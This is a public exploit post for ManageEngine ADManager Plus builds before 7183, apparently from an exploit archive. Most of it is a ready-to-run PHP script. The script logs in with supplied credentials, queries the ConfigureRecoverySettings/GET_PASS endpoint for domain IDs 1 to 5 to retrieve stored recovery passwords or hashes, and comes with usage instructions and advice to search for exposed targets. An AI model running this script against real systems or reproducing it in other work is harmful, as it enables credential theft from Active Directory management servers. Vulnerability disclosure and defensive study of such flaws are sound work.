Headline
ManageEngine ADManager 7183 Password Hash Disclosure
ManageEngine ADManager version 7183 suffers from a password hash disclosure vulnerability.
=============================================================================================================================================| # Title : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.manageengine.com/products/ad-manager/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a Password Hash disclosure vulnerability..[+] save code as poc.php .[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>[+] PayLoad :<?php// تعطيل تحذيرات HTTPSerror_reporting(0);function getPass($target, $auth, $user, $password) { // تهيئة Session $ch = curl_init(); // تحويل نوع المصادقة إذا كان ADManager if (strtolower($auth) == 'admanager') { $auth = 'ADManager Plus Authentication'; } // بيانات تسجيل الدخول $data = http_build_query([ "is_admp_pass_encrypted" => "false", "j_username" => $user, "j_password" => $password, "domainName" => $auth, "AUTHRULE_NAME" => "ADAuthenticator" ]); // إعدادات الطلب $url = $target . 'j_security_check?LogoutFromSSO=true'; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HTTPHEADER, [ "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "Content-Type: application/x-www-form-urlencoded" ]); // إرسال الطلب $response = curl_exec($ch); // التحقق من المصادقة $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if (strpos($response, 'Cookie') !== false) { echo "[+] Authentication successful!\n"; } elseif ($http_code == 200) { echo "[-] Invalid login name/password!\n"; exit(0); } else { echo "[-] Something went wrong!\n"; exit(1); } // استرجاع كلمة المرور for ($i = 1; $i <= 5; $i++) { echo "[*] Trying to fetch recovery password for domainId: $i!\n"; $passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D'; curl_setopt($ch, CURLOPT_URL, $passUrl); curl_setopt($ch, CURLOPT_POST, false); $passResponse = curl_exec($ch); if ($passResponse) { echo $passResponse . "\n"; } } curl_close($ch);}function get_args() { global $argv; $args = [ 'target' => '', 'auth' => '', 'user' => '', 'password' => '' ]; for ($i = 1; $i < count($argv); $i++) { switch ($argv[$i]) { case '-t': case '--target': $args['target'] = $argv[++$i]; break; case '-a': case '--auth': $args['auth'] = $argv[++$i]; break; case '-u': case '--user': $args['user'] = $argv[++$i]; break; case '-p': case '--password': $args['password'] = $argv[++$i]; break; } } return $args;}function main() { $args = get_args(); if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) { echo "Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n"; exit(1); } getPass($args['target'], $args['auth'], $args['user'], $args['password']);}main();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================